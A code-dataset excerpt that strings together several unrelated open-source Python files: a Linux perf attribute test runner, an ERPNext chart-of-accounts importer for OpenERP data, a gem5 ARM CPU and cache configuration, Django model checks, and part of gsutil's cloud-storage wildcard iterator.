log.debug(" [%s] %s %s" % (t, self[t], other[t]));
if not self.has_key(t) or not other.has_key(t):
return False
if not self.compare_data(self[t], other[t]):
return False
return True
def diff(self, other):
for t in Event.terms:
if not self.has_key(t) or not other.has_key(t):
continue
if not self.compare_data(self[t], other[t]):
log.warning("expected %s=%s, got %s" % (t, self[t], other[t]))
# Test file description needs to have following sections:
# [config]
# - just single instance in file
# - needs to specify:
# 'command' - perf command name
# 'args' - special command arguments
# 'ret' - expected command return value (0 by default)
#
# [eventX:base]
# - one or multiple instances in file
# - expected values assignments
class Test(object):
def __init__(self, path, options):
parser = ConfigParser.SafeConfigParser()
parser.read(path)
log.warning("running '%s'" % path)
self.path = path
self.test_dir = options.test_dir
self.perf = options.perf
self.command = parser.get('config', 'command')
self.args = parser.get('config', 'args')
try:
self.ret = parser.get('config', 'ret')
except:
self.ret = 0
self.expect = {}
self.result = {}
log.debug(" loading expected events");
self.load_events(path, self.expect)
def is_event(self, name):
if name.find("event") == -1:
return False
else:
return True
def load_events(self, path, events):
parser_event = ConfigParser.SafeConfigParser()
parser_event.read(path)
# The event record section header contains 'event' word,
# optionaly followed by ':' allowing to load 'parent
# event' first as a base
for section in filter(self.is_event, parser_event.sections()):
parser_items = parser_event.items(section);
base_items = {}
# Read parent event if there's any
if (':' in section):
base = section[section.index(':') + 1:]
parser_base = ConfigParser.SafeConfigParser()
parser_base.read(self.test_dir + '/' + base)
base_items = parser_base.items('event')
e = Event(section, parser_items, base_items)
events[section] = e
def run_cmd(self, tempdir):
cmd = "PERF_TEST_ATTR=%s %s %s -o %s/perf.data %s" % (tempdir,
self.perf, self.command, tempdir, self.args)
ret = os.WEXITSTATUS(os.system(cmd))
log.info(" '%s' ret %d " % (cmd, ret))
if ret != int(self.ret):
raise Unsup(self)
def compare(self, expect, result):
match = {}
log.debug(" compare");
# For each expected event find all matching
# events in result. Fail if there's not any.
for exp_name, exp_event in expect.items():
exp_list = []
log.debug(" matching [%s]" % exp_name)
for res_name, res_event in result.items():
log.debug(" to [%s]" % res_name)
if (exp_event.equal(res_event)):
exp_list.append(res_name)
log.debug(" ->OK")
else:
log.debug(" ->FAIL");
log.debug(" match: [%s] matches %s" % (exp_name, str(exp_list)))
# we did not any matching event - fail
if (not exp_list):
exp_event.diff(res_event)
raise Fail(self, 'match failure');
match[exp_name] = exp_list
# For each defined group in the expected events
# check we match the same group in the result.
for exp_name, exp_event in expect.items():
group = exp_event.group
if (group == ''):
continue
for res_name in match[exp_name]:
res_group = result[res_name].group
if res_group not in match[group]:
raise Fail(self, 'group failure')
log.debug(" group: [%s] matches group leader %s" %
(exp_name, str(match[group])))
log.debug(" matched")
def resolve_groups(self, events):
for name, event in events.items():
group_fd = event['group_fd'];
if group_fd == '-1':
continue;
for iname, ievent in events.items():
if (ievent['fd'] == group_fd):
event.group = iname
log.debug('[%s] has group leader [%s]' % (name, iname))
break;
def run(self):
tempdir = tempfile.mkdtemp();
try:
# run the test script
self.run_cmd(tempdir);
# load events expectation for the test
log.debug(" loading result events");
for f in glob.glob(tempdir + '/event*'):
self.load_events(f, self.result);
# resolve group_fd to event names
self.resolve_groups(self.expect);
self.resolve_groups(self.result);
# do the expectation - results matching - both ways
self.compare(self.expect, self.result)
self.compare(self.result, self.expect)
finally:
# cleanup
shutil.rmtree(tempdir)
def run_tests(options):
for f in glob.glob(options.test_dir + '/' + options.test):
try:
Test(f, options).run()
except Unsup, obj:
log.warning("unsupp %s" % obj.getMsg())
def setup_log(verbose):
global log
level = logging.CRITICAL
if verbose == 1:
level = logging.WARNING
if verbose == 2:
level = logging.INFO
if verbose >= 3:
level = logging.DEBUG
log = logging.getLogger('test')
log.setLevel(level)
ch = logging.StreamHandler()
ch.setLevel(level)
formatter = logging.Formatter('%(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
USAGE = '''%s [OPTIONS]
-d dir # tests dir
-p path # perf binary
-t test # single test
-v # verbose level
''' % sys.argv[0]
def main():
parser = optparse.OptionParser(usage=USAGE)
parser.add_option("-t", "--test",
action="store", type="string", dest="test")
parser.add_option("-d", "--test-dir",
action="store", type="string", dest="test_dir")
parser.add_option("-p", "--perf",
action="store", type="string", dest="perf")
parser.add_option("-v", "--verbose",
action="count", dest="verbose")
options, args = parser.parse_args()
if args:
parser.error('FAILED wrong arguments %s' % ' '.join(args))
return -1
setup_log(options.verbose)
if not options.test_dir:
print 'FAILED no -d option specified'
sys.exit(-1)
if not options.test:
options.test = 'test*'
try:
run_tests(options)
except Fail, obj:
print "FAILED %s" % obj.getMsg();
sys.exit(-1)
sys.exit(0)
if __name__ == '__main__':
main()
| gpl-2.0 |
indictranstech/tele-erpnext | erpnext/accounts/doctype/account/chart_of_accounts/import_from_openerp.py | 87 | 8747 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
"""
Import chart of accounts from OpenERP sources
"""
from __future__ import unicode_literals
import os, json
import ast
from xml.etree import ElementTree as ET
from frappe.utils.csvutils import read_csv_content
import frappe
path = "/Users/nabinhait/projects/odoo/addons"
accounts = {}
charts = {}
all_account_types = []
all_roots = {}
def go():
global accounts, charts
default_account_types = get_default_account_types()
country_dirs = []
for basepath, folders, files in os.walk(path):
basename = os.path.basename(basepath)
if basename.startswith("l10n_"):
country_dirs.append(basename)
for country_dir in country_dirs:
accounts, charts = {}, {}
country_path = os.path.join(path, country_dir)
manifest = ast.literal_eval(open(os.path.join(country_path, "__openerp__.py")).read())
data_files = manifest.get("data", []) + manifest.get("init_xml", []) + \
manifest.get("update_xml", [])
files_path = [os.path.join(country_path, d) for d in data_files]
xml_roots = get_xml_roots(files_path)
csv_content = get_csv_contents(files_path)
prefix = country_dir if csv_content else None
account_types = get_account_types(xml_roots.get("account.account.type", []),
csv_content.get("account.account.type", []), prefix)
account_types.update(default_account_types)
if xml_roots:
make_maps_for_xml(xml_roots, account_types, country_dir)
if csv_content:
make_maps_for_csv(csv_content, account_types, country_dir)
make_account_trees()
make_charts()
create_all_roots_file()
def get_default_account_types():
default_types_root = []
default_types_root.append(ET.parse(os.path.join(path, "account", "data",
"data_account_type.xml")).getroot())
return get_account_types(default_types_root, None, prefix="account")
def get_xml_roots(files_path):
xml_roots = frappe._dict()
for filepath in files_path:
fname = os.path.basename(filepath)
if fname.endswith(".xml"):
tree = ET.parse(filepath)
root = tree.getroot()
for node in root[0].findall("record"):
if node.get("model") in ["account.account.template",
"account.chart.template", "account.account.type"]:
xml_roots.setdefault(node.get("model"), []).append(root)
break
return xml_roots
def get_csv_contents(files_path):
csv_content = {}
for filepath in files_path:
fname = os.path.basename(filepath)
for file_type in ["account.account.template", "account.account.type",
"account.chart.template"]:
if fname.startswith(file_type) and fname.endswith(".csv"):
with open(filepath, "r") as csvfile:
try:
csv_content.setdefault(file_type, [])\
.append(read_csv_content(csvfile.read()))
except Exception, e:
continue
return csv_content
def get_account_types(root_list, csv_content, prefix=None):
types = {}
account_type_map = {
'cash': 'Cash',
'bank': 'Bank',
'tr_cash': 'Cash',
'tr_bank': 'Bank',
'receivable': 'Receivable',
'tr_receivable': 'Receivable',
'account rec': 'Receivable',
'payable': 'Payable',
'tr_payable': 'Payable',
'equity': 'Equity',
'stocks': 'Stock',
'stock': 'Stock',
'tax': 'Tax',
'tr_tax': 'Tax',
'tax-out': 'Tax',
'tax-in': 'Tax',
'charges_personnel': 'Chargeable',
'fixed asset': 'Fixed Asset',
'cogs': 'Cost of Goods Sold',
}
for root in root_list:
for node in root[0].findall("record"):
if node.get("model")=="account.account.type":
data = {}
for field in node.findall("field"):
if field.get("name")=="code" and field.text.lower() != "none" \
and account_type_map.get(field.text):
data["account_type"] = account_type_map[field.text]
node_id = prefix + "." + node.get("id") if prefix else node.get("id")
types[node_id] = data
if csv_content and csv_content[0][0]=="id":
for row in csv_content[1:]:
row_dict = dict(zip(csv_content[0], row))
data = {}
if row_dict.get("code") and account_type_map.get(row_dict["code"]):
data["account_type"] = account_type_map[row_dict["code"]]
if data and data.get("id"):
node_id = prefix + "." + data.get("id") if prefix else data.get("id")
types[node_id] = data
return types
def make_maps_for_xml(xml_roots, account_types, country_dir):
"""make maps for `charts` and `accounts`"""
for model, root_list in xml_roots.iteritems():
for root in root_list:
for node in root[0].findall("record"):
if node.get("model")=="account.account.template":
data = {}
for field in node.findall("field"):
if field.get("name")=="name":
data["name"] = field.text
if field.get("name")=="parent_id":
parent_id = field.get("ref") or field.get("eval")
data["parent_id"] = parent_id
if field.get("name")=="user_type":
value = field.get("ref")
if account_types.get(value, {}).get("account_type"):
data["account_type"] = account_types[value]["account_type"]
if data["account_type"] not in all_account_types:
all_account_types.append(data["account_type"])
data["children"] = []
accounts[node.get("id")] = data
if node.get("model")=="account.chart.template":
data = {}
for field in node.findall("field"):
if field.get("name")=="name":
data["name"] = field.text
if field.get("name")=="account_root_id":
data["account_root_id"] = field.get("ref")
data["id"] = country_dir
charts.setdefault(node.get("id"), {}).update(data)
def make_maps_for_csv(csv_content, account_types, country_dir):
for content in csv_content.get("account.account.template", []):
for row in content[1:]:
data = dict(zip(content[0], row))
account = {
"name": data.get("name"),
"parent_id": data.get("parent_id:id") or data.get("parent_id/id"),
"children": []
}
user_type = data.get("user_type/id") or data.get("user_type:id")
if account_types.get(user_type, {}).get("account_type"):
account["account_type"] = account_types[user_type]["account_type"]
if account["account_type"] not in all_account_types:
all_account_types.append(account["account_type"])
accounts[data.get("id")] = account
if not account.get("parent_id") and data.get("chart_template_id:id"):
chart_id = data.get("chart_template_id:id")
charts.setdefault(chart_id, {}).update({"account_root_id": data.get("id")})
for content in csv_content.get("account.chart.template", []):
for row in content[1:]:
if row:
data = dict(zip(content[0], row))
charts.setdefault(data.get("id"), {}).update({
"account_root_id": data.get("account_root_id:id") or \
data.get("account_root_id/id"),
"name": data.get("name"),
"id": country_dir
})
def make_account_trees():
"""build tree hierarchy"""
for id in accounts.keys():
account = accounts[id]
if account.get("parent_id"):
if accounts.get(account["parent_id"]):
# accounts[account["parent_id"]]["children"].append(account)
accounts[account["parent_id"]][account["name"]] = account
del account["parent_id"]
del account["name"]
# remove empty children
for id in accounts.keys():
if "children" in accounts[id] and not accounts[id].get("children"):
del accounts[id]["children"]
def make_charts():
"""write chart files in app/setup/doctype/company/charts"""
for chart_id in charts:
src = charts[chart_id]
if not src.get("name") or not src.get("account_root_id"):
continue
if not src["account_root_id"] in accounts:
continue
filename = src["id"][5:] + "_" + chart_id
print "building " + filename
chart = {}
chart["name"] = src["name"]
chart["country_code"] = src["id"][5:]
chart["tree"] = accounts[src["account_root_id"]]
for key, val in chart["tree"].items():
if key in ["name", "parent_id"]:
chart["tree"].pop(key)
if type(val) == dict:
val["root_type"] = ""
if chart:
fpath = os.path.join("erpnext", "erpnext", "accounts", "doctype", "account",
"chart_of_accounts", filename + ".json")
with open(fpath, "r") as chartfile:
old_content = chartfile.read()
if not old_content or (json.loads(old_content).get("is_active", "No") == "No" \
and json.loads(old_content).get("disabled", "No") == "No"):
with open(fpath, "w") as chartfile:
chartfile.write(json.dumps(chart, indent=4, sort_keys=True))
all_roots.setdefault(filename, chart["tree"].keys())
def create_all_roots_file():
with open('all_roots.txt', 'w') as f:
for filename, roots in sorted(all_roots.items()):
f.write(filename)
f.write('\n----------------------\n')
for r in sorted(roots):
f.write(r.encode('utf-8'))
f.write('\n')
f.write('\n\n\n')
if __name__=="__main__":
go()
| agpl-3.0 |
utsav2601/cmpe295A | tools/arm_gem5/O3_ARM_v7a.py | 9 | 6472 | # Copyright (c) 2012 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ron Dreslinski
from m5.objects import *
# Simple ALU Instructions have a latency of 1
class O3_ARM_v7a_Simple_Int(FUDesc):
opList = [ OpDesc(opClass='IntAlu', opLat=1) ]
count = 2
# Complex ALU instructions have a variable latencies
class O3_ARM_v7a_Complex_Int(FUDesc):
opList = [ OpDesc(opClass='IntMult', opLat=3, issueLat=1),
OpDesc(opClass='IntDiv', opLat=12, issueLat=12),
OpDesc(opClass='IprAccess', opLat=3, issueLat=1) ]
count = 1
# Floating point and SIMD instructions
class O3_ARM_v7a_FP(FUDesc):
opList = [ OpDesc(opClass='SimdAdd', opLat=4),
OpDesc(opClass='SimdAddAcc', opLat=4),
OpDesc(opClass='SimdAlu', opLat=4),
OpDesc(opClass='SimdCmp', opLat=4),
OpDesc(opClass='SimdCvt', opLat=3),
OpDesc(opClass='SimdMisc', opLat=3),
OpDesc(opClass='SimdMult',opLat=5),
OpDesc(opClass='SimdMultAcc',opLat=5),
OpDesc(opClass='SimdShift',opLat=3),
OpDesc(opClass='SimdShiftAcc', opLat=3),
OpDesc(opClass='SimdSqrt', opLat=9),
OpDesc(opClass='SimdFloatAdd',opLat=5),
OpDesc(opClass='SimdFloatAlu',opLat=5),
OpDesc(opClass='SimdFloatCmp', opLat=3),
OpDesc(opClass='SimdFloatCvt', opLat=3),
OpDesc(opClass='SimdFloatDiv', opLat=3),
OpDesc(opClass='SimdFloatMisc', opLat=3),
OpDesc(opClass='SimdFloatMult', opLat=3),
OpDesc(opClass='SimdFloatMultAcc',opLat=1),
OpDesc(opClass='SimdFloatSqrt', opLat=9),
OpDesc(opClass='FloatAdd', opLat=5),
OpDesc(opClass='FloatCmp', opLat=5),
OpDesc(opClass='FloatCvt', opLat=5),
OpDesc(opClass='FloatDiv', opLat=9, issueLat=9),
OpDesc(opClass='FloatSqrt', opLat=33, issueLat=33),
OpDesc(opClass='FloatMult', opLat=4) ]
count = 2
# Load/Store Units
class O3_ARM_v7a_Load(FUDesc):
opList = [ OpDesc(opClass='MemRead',opLat=2) ]
count = 1
class O3_ARM_v7a_Store(FUDesc):
opList = [OpDesc(opClass='MemWrite',opLat=2) ]
count = 1
# Functional Units for this CPU
class O3_ARM_v7a_FUP(FUPool):
FUList = [O3_ARM_v7a_Simple_Int(), O3_ARM_v7a_Complex_Int(),
O3_ARM_v7a_Load(), O3_ARM_v7a_Store(), O3_ARM_v7a_FP()]
class O3_ARM_v7a_3(DerivO3CPU):
predType = "tournament"
localPredictorSize = 64
localCtrBits = 2
localHistoryTableSize = 64
localHistoryBits = 6
globalPredictorSize = 8192
globalCtrBits = 2
globalHistoryBits = 13
choicePredictorSize = 8192
choiceCtrBits = 2
BTBEntries = 2048
BTBTagSize = 18
RASSize = 16
instShiftAmt = 2
LQEntries = 16
SQEntries = 16
LSQDepCheckShift = 0
LFSTSize = 1024
SSITSize = 1024
decodeToFetchDelay = 1
renameToFetchDelay = 1
iewToFetchDelay = 1
commitToFetchDelay = 1
renameToDecodeDelay = 1
iewToDecodeDelay = 1
commitToDecodeDelay = 1
iewToRenameDelay = 1
commitToRenameDelay = 1
commitToIEWDelay = 1
fetchWidth = 3
fetchToDecodeDelay = 3
decodeWidth = 3
decodeToRenameDelay = 2
renameWidth = 3
renameToIEWDelay = 1
issueToExecuteDelay = 1
dispatchWidth = 6
issueWidth = 8
wbWidth = 8
wbDepth = 1
fuPool = O3_ARM_v7a_FUP()
iewToCommitDelay = 1
renameToROBDelay = 1
commitWidth = 8
squashWidth = 8
trapLatency = 13
backComSize = 5
forwardComSize = 5
numPhysIntRegs = 128
numPhysFloatRegs = 128
numIQEntries = 32
numROBEntries = 40
defer_registration= False
# Instruction Cache
# All latencys assume a 1GHz clock rate, with a faster clock they would be faster
class O3_ARM_v7a_ICache(BaseCache):
response_latency = '1'
block_size = 64
mshrs = 2
tgts_per_mshr = 8
size = '32kB'
assoc = 2
is_top_level = 'true'
# Data Cache
# All latencys assume a 1GHz clock rate, with a faster clock they would be faster
class O3_ARM_v7a_DCache(BaseCache):
response_latency = '2'
block_size = 64
mshrs = 6
tgts_per_mshr = 8
size = '32kB'
assoc = 2
write_buffers = 16
is_top_level = 'true'
# TLB Cache
# Use a cache as a L2 TLB
class O3_ARM_v7aWalkCache(BaseCache):
response_latency = '4'
block_size = 64
mshrs = 6
tgts_per_mshr = 8
size = '1kB'
assoc = 8
write_buffers = 16
is_top_level = 'true'
# L2 Cache
# All latencys assume a 1GHz clock rate, with a faster clock they would be faster
class O3_ARM_v7aL2(BaseCache):
response_latency = '12'
block_size = 64
mshrs = 16
tgts_per_mshr = 8
size = '1MB'
assoc = 16
write_buffers = 8
prefetch_on_access = 'true'
# Simple stride prefetcher
prefetcher = StridePrefetcher(degree=8, latency=1)
| mit |
zedr/django | django/core/checks/model_checks.py | 6 | 1857 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from itertools import chain
import types
from django.apps import apps
from . import Error, register
@register('models')
def check_all_models(app_configs=None, **kwargs):
errors = [model.check(**kwargs)
for model in apps.get_models()
if app_configs is None or model._meta.app_config in app_configs]
return list(chain(*errors))
@register('models', 'signals')
def check_model_signals(app_configs=None, **kwargs):
"""Ensure lazily referenced model signals senders are installed."""
from django.db import models
errors = []
for name in dir(models.signals):
obj = getattr(models.signals, name)
if isinstance(obj, models.signals.ModelSignal):
for reference, receivers in obj.unresolved_references.items():
for receiver, _, _ in receivers:
# The receiver is either a function or an instance of class
# defining a `__call__` method.
if isinstance(receiver, types.FunctionType):
description = "The `%s` function" % receiver.__name__
else:
description = "An instance of the `%s` class" % receiver.__class__.__name__
errors.append(
Error(
"%s was connected to the `%s` signal "
"with a lazy reference to the '%s' sender, "
"which has not been installed." % (
description, name, '.'.join(reference)
),
obj=receiver.__module__,
hint=None,
id='E014'
)
)
return errors
| bsd-3-clause |
liaorubei/depot_tools | third_party/gsutil/gslib/wildcard_iterator.py | 50 | 20828 | # Copyright 2010 Google Inc. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""Implementation of wildcarding over StorageUris.
StorageUri is an abstraction that Google introduced in the boto library,
for representing storage provider-independent bucket and object names with
a shorthand URI-like syntax (see boto/boto/storage_uri.py) The current
class provides wildcarding support for StorageUri objects (including both
bucket and file system objects), allowing one to express collections of
objects with syntax like the following:
gs://mybucket/images/*.png
file:///tmp/???abc???
We provide wildcarding support as part of gsutil rather than as part
of boto because wildcarding is really part of shell command-like
functionality.
A comment about wildcard semantics: We support both single path component
wildcards (e.g., using '*') and recursive wildcards (using '**'), for both
file and cloud URIs. For example,
gs://bucket/doc/*/*.html
would enumerate HTML files one directory down from gs://bucket/doc, while
gs://bucket/**/*.html
would enumerate HTML files in all objects contained in the bucket.
Note also that if you use file system wildcards it's likely your shell
interprets the wildcarding before passing the command to gsutil. For example:
% gsutil cp /opt/eclipse/*/*.html gs://bucket/eclipse
would likely be expanded by the shell into the following before running gsutil:
% gsutil cp /opt/eclipse/RUNNING.html gs://bucket/eclipse
Note also that most shells don't support '**' wildcarding (I think only
zsh does). If you want to use '**' wildcarding with such a shell you can
single quote each wildcarded string, so it gets passed uninterpreted by the
shell to gsutil (at which point gsutil will perform the wildcarding expansion):
% gsutil cp '/opt/eclipse/**/*.html' gs://bucket/eclipse
"""
import boto
import fnmatch
import glob
import os
import re
import sys
import urllib
from boto.s3.prefix import Prefix
from boto.storage_uri import BucketStorageUri
from bucket_listing_ref import BucketListingRef
# Regex to determine if a string contains any wildcards.
WILDCARD_REGEX = re.compile('[*?\[\]]')
WILDCARD_OBJECT_ITERATOR = 'wildcard_object_iterator'
WILDCARD_BUCKET_ITERATOR = 'wildcard_bucket_iterator'
class WildcardIterator(object):
"""Base class for wildcarding over StorageUris.
This class implements support for iterating over StorageUris that
contain wildcards.
The base class is abstract; you should instantiate using the
wildcard_iterator() static factory method, which chooses the right
implementation depending on the StorageUri.
"""
def __repr__(self):
"""Returns string representation of WildcardIterator."""
return 'WildcardIterator(%s)' % self.wildcard_uri
class CloudWildcardIterator(WildcardIterator):
"""WildcardIterator subclass for buckets and objects.
Iterates over BucketListingRef matching the StorageUri wildcard. It's
much more efficient to request the Key from the BucketListingRef (via
GetKey()) than to request the StorageUri and then call uri.get_key()
to retrieve the key, for cases where you want to get metadata that's
available in the Bucket (for example to get the name and size of
each object), because that information is available in the bucket GET
results. If you were to iterate over URIs for such cases and then get
the name and size info from each resulting StorageUri, it would cause
an additional object GET request for each of the result URIs.
"""
def __init__(self, wildcard_uri, proj_id_handler,
bucket_storage_uri_class=BucketStorageUri, all_versions=False,
headers=None, debug=0):
"""
Instantiates an iterator over BucketListingRef matching given wildcard URI.
Args:
wildcard_uri: StorageUri that contains the wildcard to iterate.
proj_id_handler: ProjectIdHandler to use for current command.
bucket_storage_uri_class: BucketStorageUri interface.
Settable for testing/mocking.
headers: Dictionary containing optional HTTP headers to pass to boto.
debug: Debug level to pass in to boto connection (range 0..3).
"""
self.wildcard_uri = wildcard_uri
# Make a copy of the headers so any updates we make during wildcard
# expansion aren't left in the input params (specifically, so we don't
# include the x-goog-project-id header needed by a subset of cases, in
# the data returned to caller, which could then be used in other cases
# where that header must not be passed).
if headers is None:
self.headers = {}
else:
self.headers = headers.copy()
self.proj_id_handler = proj_id_handler
self.bucket_storage_uri_class = bucket_storage_uri_class
self.all_versions = all_versions
self.debug = debug
def __iter__(self):
"""Python iterator that gets called when iterating over cloud wildcard.
Yields:
BucketListingRef, or empty iterator if no matches.
"""
# First handle bucket wildcarding, if any.
if ContainsWildcard(self.wildcard_uri.bucket_name):
regex = fnmatch.translate(self.wildcard_uri.bucket_name)
bucket_uris = []
prog = re.compile(regex)
self.proj_id_handler.FillInProjectHeaderIfNeeded(WILDCARD_BUCKET_ITERATOR,
self.wildcard_uri,
self.headers)
for b in self.wildcard_uri.get_all_buckets(headers=self.headers):
if prog.match(b.name):
# Use str(b.name) because get_all_buckets() returns Unicode
# string, which when used to construct x-goog-copy-src metadata
# requests for object-to-object copies causes pathname '/' chars
# to be entity-encoded (bucket%2Fdir instead of bucket/dir),
# which causes the request to fail.
uri_str = '%s://%s' % (self.wildcard_uri.scheme,
urllib.quote_plus(str(b.name)))
bucket_uris.append(
boto.storage_uri(
uri_str, debug=self.debug,
bucket_storage_uri_class=self.bucket_storage_uri_class,
suppress_consec_slashes=False))
else:
bucket_uris = [self.wildcard_uri.clone_replace_name('')]
# Now iterate over bucket(s), and handle object wildcarding, if any.
self.proj_id_handler.FillInProjectHeaderIfNeeded(WILDCARD_OBJECT_ITERATOR,
self.wildcard_uri,
self.headers)
for bucket_uri in bucket_uris:
if self.wildcard_uri.names_bucket():
# Bucket-only URI.
yield BucketListingRef(bucket_uri, key=None, prefix=None,
headers=self.headers)
else:
# URI contains an object name. If there's no wildcard just yield
# the needed URI.
if not ContainsWildcard(self.wildcard_uri.object_name):
uri_to_yield = bucket_uri.clone_replace_name(
self.wildcard_uri.object_name)
yield BucketListingRef(uri_to_yield, key=None, prefix=None,
headers=self.headers)
else:
# URI contains a wildcard. Expand iteratively by building
# prefix/delimiter bucket listing request, filtering the results per
# the current level's wildcard, and continuing with the next component
# of the wildcard. See _BuildBucketFilterStrings() documentation
# for details.
#
# Initialize the iteration with bucket name from bucket_uri but
# object name from self.wildcard_uri. This is needed to handle cases
# where both the bucket and object names contain wildcards.
uris_needing_expansion = [
bucket_uri.clone_replace_name(self.wildcard_uri.object_name)]
while len(uris_needing_expansion) > 0:
uri = uris_needing_expansion.pop(0)
(prefix, delimiter, prefix_wildcard, suffix_wildcard) = (
self._BuildBucketFilterStrings(uri.object_name))
prog = re.compile(fnmatch.translate(prefix_wildcard))
# List bucket for objects matching prefix up to delimiter.
for key in bucket_uri.list_bucket(prefix=prefix,
delimiter=delimiter,
headers=self.headers,
all_versions=self.all_versions):
# Check that the prefix regex matches rstripped key.name (to
# correspond with the rstripped prefix_wildcard from
# _BuildBucketFilterStrings()).
if prog.match(key.name.rstrip('/')):
if suffix_wildcard and key.name.rstrip('/') != suffix_wildcard:
if isinstance(key, Prefix):
# There's more wildcard left to expand.
uris_needing_expansion.append(
uri.clone_replace_name(key.name.rstrip('/') + '/'
+ suffix_wildcard))
else:
# Done expanding.
expanded_uri = uri.clone_replace_key(key)
if isinstance(key, Prefix):
yield BucketListingRef(expanded_uri, key=None, prefix=key,
headers=self.headers)
else:
if self.all_versions:
yield BucketListingRef(expanded_uri, key=key, prefix=None,
headers=self.headers)
else:
# Yield BLR wrapping version-less URI.
yield BucketListingRef(expanded_uri.clone_replace_name(
expanded_uri.object_name), key=key, prefix=None,
headers=self.headers)
def _BuildBucketFilterStrings(self, wildcard):
"""
Builds strings needed for querying a bucket and filtering results to
implement wildcard object name matching.
Args:
wildcard: The wildcard string to match to objects.
Returns:
(prefix, delimiter, prefix_wildcard, suffix_wildcard)
where:
prefix is the prefix to be sent in bucket GET request.
delimiter is the delimiter to be sent in bucket GET request.
prefix_wildcard is the wildcard to be used to filter bucket GET results.
suffix_wildcard is wildcard to be appended to filtered bucket GET
results for next wildcard expansion iteration.
For example, given the wildcard gs://bucket/abc/d*e/f*.txt we
would build prefix= abc/d, delimiter=/, prefix_wildcard=d*e, and
suffix_wildcard=f*.txt. Using this prefix and delimiter for a bucket
listing request will then produce a listing result set that can be
filtered using this prefix_wildcard; and we'd use this suffix_wildcard
to feed into the next call(s) to _BuildBucketFilterStrings(), for the
next iteration of listing/filtering.
Raises:
AssertionError if wildcard doesn't contain any wildcard chars.
"""
# Generate a request prefix if the object name part of the wildcard starts
# with a non-wildcard string (e.g., that's true for 'gs://bucket/abc*xyz').
match = WILDCARD_REGEX.search(wildcard)
if not match:
# Input "wildcard" has no wildcard chars, so just return tuple that will
# cause a bucket listing to match the given input wildcard. Example: if
# previous iteration yielded gs://bucket/dir/ with suffix_wildcard abc,
# the next iteration will call _BuildBucketFilterStrings() with
# gs://bucket/dir/abc, and we will return prefix ='dir/abc',
# delimiter='/', prefix_wildcard='dir/abc', and suffix_wildcard=''.
prefix = wildcard
delimiter = '/'
prefix_wildcard = wildcard
suffix_wildcard = ''
else:
if match.start() > 0:
# Wildcard does not occur at beginning of object name, so construct a
# prefix string to send to server.
prefix = wildcard[:match.start()]
wildcard_part = wildcard[match.start():]
else:
prefix = None
wildcard_part = wildcard
end = wildcard_part.find('/')
if end != -1:
wildcard_part = wildcard_part[:end+1]
# Remove trailing '/' so we will match gs://bucket/abc* as well as
# gs://bucket/abc*/ with the same wildcard regex.
prefix_wildcard = ((prefix or '') + wildcard_part).rstrip('/')
suffix_wildcard = wildcard[match.end():]
end = suffix_wildcard.find('/')
if end == -1:
suffix_wildcard = ''
else:
suffix_wildcard = suffix_wildcard[end+1:]
# To implement recursive (**) wildcarding, if prefix_wildcard
# suffix_wildcard starts with '**' don't send a delimiter, and combine
# suffix_wildcard at end of prefix_wildcard.
if prefix_wildcard.find('**') != -1:
delimiter = None
prefix_wildcard = prefix_wildcard + suffix_wildcard
suffix_wildcard = ''
else:
delimiter = '/'
delim_pos = suffix_wildcard.find(delimiter)
# The following debug output is useful for tracing how the algorithm
# walks through a multi-part wildcard like gs://bucket/abc/d*e/f*.txt
if self.debug > 1:
sys.stderr.write(
'DEBUG: wildcard=%s, prefix=%s, delimiter=%s, '
'prefix_wildcard=%s, suffix_wildcard=%s\n' %
(wildcard, prefix, delimiter, prefix_wildcard, suffix_wildcard))
return (prefix, delimiter, prefix_wildcard, suffix_wildcard)
def IterKeys(self):
"""
Convenience iterator that runs underlying iterator and returns Key for each
iteration.
Yields:
Subclass of boto.s3.key.Key, or empty iterator if no matches.
Raises:
WildcardException: for bucket-only uri.
"""
for bucket_listing_ref in self. __iter__():
if bucket_listing_ref.HasKey():
